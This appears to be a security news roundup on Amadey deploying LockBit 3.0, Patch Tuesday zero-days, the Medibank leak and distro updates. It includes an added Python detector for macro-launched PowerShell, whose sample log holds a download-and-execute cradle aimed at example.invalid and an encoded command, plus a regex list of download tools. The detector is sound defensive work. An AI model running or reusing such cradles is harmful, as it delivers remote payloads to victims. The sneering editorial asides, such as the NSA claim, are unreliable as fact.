Security Leftovers
-
Amadey Bot Spotted Deploying LockBit 3.0 Ransomware on Hacked Machines [Ed: Microsoft Windows TCO]
The cybersecurity firm's latest analysis is based on a Microsoft Word file ("심시아.docx") that was uploaded to VirusTotal on October 28, 2022. The document contains a malicious VBA macro that, when enabled by the victim, runs a PowerShell command to download and run Amadey.
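The chain described above (Office document, macro enabled, PowerShell download cradle) is also the most detectable part of it: a process-creation event where an Office binary is the parent of a shell, with download or evasion switches on the command line. The following is an added example, not code from the article or from the firm it cites, showing that detection logic run over a handful of constructed process-creation events. The field names mirror Sysmon Event ID 1, but the log lines, the file paths and the `example.invalid` URL are all made up for this example.

```python
"""Added example: flag Office-spawned shells carrying download-cradle indicators.
The log format and the sample events below are constructed for illustration;
they are not real telemetry."""
import re
from dataclasses import dataclass

# Parents a macro runs under, and the children a macro typically launches.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe"}

# Command-line indicators of a download cradle or of evasion switches.
INDICATORS = [
    ("webclient-download", re.compile(r"downloadstring|downloadfile", re.I)),
    ("web-request", re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I)),
    ("bits-or-certutil", re.compile(r"start-bitstransfer|certutil.+urlcache", re.I)),
    ("encoded-command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("evasion-switches", re.compile(
        r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b|-ep\s+bypass|-executionpolicy\s+bypass", re.I)),
]

@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

def basename(path):
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score(ev):
    """Return (score, reasons). Office-parent-spawns-shell plus at least one
    command-line indicator (score >= 2) is the alerting threshold used here."""
    reasons = []
    if basename(ev.parent_image) in OFFICE_PARENTS and basename(ev.image) in SHELL_CHILDREN:
        reasons.append("office-parent-spawns-shell")
    for name, rx in INDICATORS:
        if rx.search(ev.command_line):
            reasons.append("cmdline:" + name)
    return len(reasons), reasons

def parse_line(line):
    """Constructed format: '|'-separated Key=Value pairs (split on first '=' only,
    because command lines themselves contain '=')."""
    fields = dict(kv.split("=", 1) for kv in line.split("|"))
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])

def detect(lines, threshold=2):
    """Return [(child_image, reasons)] for every event at or above threshold."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        s, reasons = score(ev)
        if s >= threshold:
            hits.append((basename(ev.image), reasons))
    return hits

# Constructed sample events (not real logs).
SAMPLE_LOG = [
    # 1: macro-style cradle: Word -> hidden PowerShell -> DownloadString
    r'ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
    r'|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    r'|CommandLine=powershell -w hidden -nop -c IEX(New-Object Net.WebClient)'
    r'.DownloadString("http://example.invalid/x.ps1")',
    # 2: benign: scheduled script launched from explorer, no Office parent
    r'ParentImage=C:\Windows\explorer.exe'
    r'|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    r'|CommandLine=powershell -File C:\scripts\backup.ps1',
    # 3: Office parent but no cradle indicators: score 1, below threshold
    r'ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
    r'|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    r'|CommandLine=powershell -File \\fileserver\tools\refresh.ps1',
    # 4: Word -> cmd -> encoded PowerShell command
    r'ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
    r'|Image=C:\Windows\System32\cmd.exe'
    r'|CommandLine=cmd /c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
]

if __name__ == "__main__":
    for image, reasons in detect(SAMPLE_LOG):
        print(image, reasons)
```

The threshold is deliberately two signals rather than one: Office legitimately launches PowerShell in some environments (event 3), and download verbs appear in plenty of admin scripts (event 2), but the combination of an Office parent with a cradle or evasion switch is what the Amadey lure relies on. In a real deployment the parent/child check belongs in the SIEM rule and the indicator list should be tuned against the organisation's own baseline.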
-
Microsoft fixes four zero-days, 58 other flaws on Patch Tuesday [Ed: Microsoft already helped the NSA exploit these, and for who knows how long....]
Microsoft has released patches for four zero-day vulnerabilities among the 62 advisories which it released on Wednesday AEDT, in its monthly Patch Tuesday fixes. All of these zero-days have been exploited in the wild.
Nine of the flaws detailed were in the critical category, the security firm Tenable said in its analysis, with 53 being in the next, important, category.
Top of the list were two vulnerabilities that affect Windows Mark of the Web, a security feature used to tag files that are downloaded from the Internet, and prevent them from carrying out certain functions.
-
iTWire - Ransomware group keeps its word, posts Medibank data on dark web
A ransomware group that on Tuesday threatened to post data stolen from medical insurer Medibank Group on the dark web has kept its word and released a small sample of what it claims is the data it appropriated.
The operator of this group, that hosts a copy of the site formerly used by the REvil gang, said the data was stored "in not very understandable format (tables dumps) we'll take some time to sort it out and we posting (sic) a small part of the data, in 'human readable format (sample in json file )' also we post all raw data."
[...]
The name of the ransomware used is not definite but some refer to it as BlogXX. But it can attack only systems running Microsoft's Windows operating system.
-
Security updates for Tuesday [LWN.net]
Security updates have been issued by Debian (pixman and sudo), Fedora (mingw-binutils and mingw-gdb), Red Hat (bind, bind9.16, container-tools:3.0, container-tools:4.0, container-tools:rhel8, dnsmasq, dotnet7.0, dovecot, e2fsprogs, flatpak-builder, freetype, fribidi, gdisk, grafana, grafana-pcp, gstreamer1-plugins-good, httpd:2.4, kernel, kernel-rt, libldb, libreoffice, libtiff, libxml2, mingw-expat, mingw-zlib, mutt, nodejs:14, nodejs:18, openblas, openjpeg2, osbuild, pcs, php:7.4, php:8.0, pki-core:10.6 and pki-deps:10.6, poppler, protobuf, python27:2.7, python38:3.8 and python38-devel:3.8, python39:3.9 and python39-devel:3.9, qt5, redis:6, rsync, unbound, virt:rhel, virt-devel:rhel, wavpack, webkit2gtk3, xmlrpc-c, xorg-x11-server, xorg-x11-server-Xwayland, and yajl), SUSE (exiv2, expat, rubygem-nokogiri, sudo, and vsftpd), and Ubuntu (isc-dhcp, libraw, sqlite3, and tiff).